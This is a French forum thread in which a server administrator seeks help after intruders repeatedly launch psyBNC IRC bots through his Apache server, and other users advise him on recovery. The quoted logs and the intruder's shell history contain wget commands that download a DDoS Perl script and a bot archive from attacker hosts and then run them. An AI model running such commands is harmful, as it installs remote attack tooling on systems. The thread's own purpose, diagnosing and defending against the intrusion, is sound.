Bonjour

voila j'ai un petit problème en ce moment sur un serveur avec apache.

Apparament il y a une faille de sécurité, car régulièrement le matin je me retrouve avec un daemon irc lancé sous le compte "www"

Voici ce que j'ai dans les logs apache:
c'ets dans le fichier /var/log/httpd-error.log

Quote:

Undefined subroutine &main::notice called at bot.txt line 174. sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' x VNC_bypauth sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' ./VNC_bypauth: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' sysctl: unknown oid 'kernel.ostype' sysctl: unknown oid 'kernel.osrelease' ./VNC_bypauth: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory --19:34:53--  http://alienr0x.by.ru/.ddos.pl           => `.ddos.pl' Resolving alienr0x.by.ru... 217.16.29.51 Connecting to alienr0x.by.ru|217.16.29.51|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 11,100 (11K) [text/plain]    0K ..........                                            100%   25.94 KB/s 19:35:03 (25.94 KB/s) - `.ddos.pl' saved [11100/11100]

Et voila ce que j'ai dans le fichier .bash_history qui se trouve dans /var/tmp

Quote:

id cd /tmp tar -zvxf psy.tar.gz ./config dtr 8888 cd .psy ./config dtr 9090 ./crappity smack ./run cd /tmp ls -a wget http://www.chanary.net/tools/psy.tar.gz tar -zvxf psy.tar.gz cd .psy ./config dtr 9090 ./crappity smack ./run ls -a cd /tmp ls -a uname -a ./f3 rm crond ls -a uname -a id

D'aprézs mes recherche c'est psybnc, un bot irc.

le problème c'est que j'ai tout passé en dernière version (apache, perl, php) et je vois pas ou ils pourraient :(

Vous auriez uen idée ?

Merci d'avance.

1- sortir le serveur de prod
2- retrouver ces précieuses sauvegardes
3- RAZ du serveur et réinstallation
4- restauration des données
5- remise en prod

Bonjour,

Est-ce qu'il existe des détecteurs de rootkit sous FreeBSD ?
Si oui, je passerai un petit coup pour voir s'ils détectent qqchose.
cela serait pour voir s'il n'y apas autres choses de touché.

Autrement, +1 méthode francis

Le problème c'ets que je voudrais bien m'affranchir de cette etape de justement tout re-installer :)

j'ai fait un check de tous les fichiers créés ou accédés récement et j'ai suprimer tout ce qu'il avait pu mettre.

c'etait dans /tmp et /var/tmp

des dossiers avec a l'intérieur les sources pour compiler etc....
les dossiers etaient:
.psy
.f3
.iroserv
.iroircf

Bref la tout est propre, j'ai remis a zero les log apache et les log système pour voir par ou ils peuvent bien passer :(

jc1, un début de réponse ici avec rkhunter:
https://forums.fug-fr.org/cgi-bin/yabb2/YaBB.pl?num=1158320051
mais je n'y connais vraiment rien.

firebolt31 wrote on 31. May 2007 at 18:44:

Le problème c'ets que je voudrais bien m'affranchir de cette etape de justement tout re-installer :)

Je comprend, mais c'est pourtant le plus sûr et, sans doute, le plus rapide pour retrouver un serveur *digne de confiance*: les outils de détection de rootkit ne sont pas infaillibles (aussi fiables que les antivirus).
D'autant plus que tu ne connais pas le moyen par lequel le contrôle a été pris (la porte est peut-être encore grande ouverte), ni l'étendue de l'intrusion (root ?).

Après, c'est comme tu sens; n'oublie pas, par contre, que si ton système sert de vecteur d'attaque (...ddos.pl dans ton error-log apache, notamment), tu es responsable.

Un peu de lecture à propos de ça:

• Re: Recovering from compromise
  
• psybnc and IRC hack
  
• Recent compromise of freefall.freebsd.org
  
• Recognizing and Recovering from Rootkit Attacks

Juste histoire d'appuyer la réponse de francis...

J'ai moi même été victime de ce genre d'attaque, des psybnc étaient lancés sur ma machine et servaient visiblement à tous un tas de gens de passerelle pour se connecté au réseau IRC QuakeNet.

Eliminer les sources que tu as trouvés dans /tmp me paraît inutile, tous un tas de binaires systèmes on pu être modifiés/remplacés pour laisser une porte d'entrée béante ouverte sur ta machine et leur permettrent de revenir sans même ré-exploiter la première faille trouvé. De plus les binaires les plus courant comme ps, top, netstat on pu être remplacé par des versions qui n'affichent pas les process ou connexion qu'ils utilisent (c'est ce qui s'est passé pour moi)

Donc comme Francis la dis, ne cherche pas, ta machine et déja corrompu et rien ne pourra plus t'assurer qu'elle est "secure".

si jamais, après la nouvelle install, monte ton dossier /tmp avec l'option "noexec", ça fait pas tout, mais arrête déja pas mal de rootkit.

Je doute qu'il y est un trou de sécurité dans apache. Par contre, tu tournes surement un forum ou une application du genre que tu n'a pas mis à jour.
Comme le dit francis, la seule solution est la réinstallation complète du système.
En cas d'intrusion, tu ne peux plus faire confiance à ton système.

Il serait intéressant d'isoler ta machine pour quelques temps et d'analyser un peu plus la situation.

Bon courage.

Une idée ?
Dans Apache, on peut rajouter un module " mod_security ", qui filtre les problèmes et attaques dus aux applications (PHP, extc....).
Dans le cas présent, on pourrait rajouter une ligne dans  le ruleset de mod_security:
# Block various methods of downloading files to a server "
- - --
SecFilterSelective THE_REQUEST "psybnc "
- - -- -   -
extc......

Par ailleurs, il n'est pas sur que l'attaquant utilise la machine pour autre chose, mais en temps que root, il peut ausssi avoir modifié l'affichage de ps pour rester invisible, et déclencher des problèmes autres qu'informatiques.
Mais enfin, en prod, je serais tenté de rejoindre l'avis de francis, sachant que les back-ups peuvent etre vérolés aussi.

Mon problème est le suivant :)

La machine etait parfaitement à jour de tous ces patchs, j'y passe un jour par semaine pour tout vérifier et mettre tous els composants à jour.

Donc ils ont réussi a passer malgré une machien à jour donc avant de refaire une machine complète (ce quie st effectivement le plus ainsi que le changement de tous les accés connus sur cette machine), je voudrais trouver avec certitude par ou ils sont passés :)

parce que admettons que ce week-en dje refasse la machine, elle sera configuré comme avant et si lundi matin ca recommence ben je serais aussi "bete" qu'avant :)

J'ai passé un coup de rkhunter et la seule chose qu'il a détecté c'est la version de openssl qui n'était pas à jour d'une version mineure :(

10 euros que tu tournes php dessus.
Peux-tu nous lister les applications web qui sont disponible sur ton serveur web?

Et pour un € de plus, je suis allé sur http://alienr0x.by.ru/ mentionné dans le post de firebolt31, il me semble qu'il y a là tout ce qu'il faut comme exploits, rootkits, backdoors, pour les Linux et les BSD et autres serveurs, mais beaucoup sont précompilés. Y a des trucs vraiment méchants ( quand on peut les lire), ou avec Hotmail extc...  :'(

Attention, certains cherchent à se connecter !

Bon, je va au dodo...

Bonjour,

Un complément au chasseur de rootkit
http://www.rootkit.nl/projects/rootkit_hunter.html

ici : http://www.nongnu.org/tiger/

Alors pour les applis ben v que c'ets un frontal web, il y a apache, php, webmin et ssh qui tourne dessus :)

Donc effectivement il y a php et j'ai trouvé le problème.

Un formulaire de soumission de document mal voir carrement pas protégé du tout :(
Et dire qu'on a payé un max pour la conception de ce site :(

Bon en tout cas j'y ai passé mon week-end dessus.
Résultat j'ai changé tous les accés au serveur, patché tout ce qui pouvait être encore patchable a dimanche aprem.
Passé plusieurs anti-rootkit.

Si je peux m'affranchir de la re-install ca m'arrangerais.

Apparament depuis hier plus d'instrusion sur le serveur ni de lancement des bots.

je vais le surveiller pendant la semaine pour voir ce qui se passe.

j'ai aussi fait des règles sur le firewall pour interdire complètement les ips de ces sites et les ips que j'ai pu trouver dans leurs scripts.

En tout cas merci de vos précieux conseils.

Que fait webmin sur ton serveur web?

pour avoir une interface de gestion graphique pour celui qui administre le serveur web

Il sait pas administrer le serveur via ssh en ligne de commande :(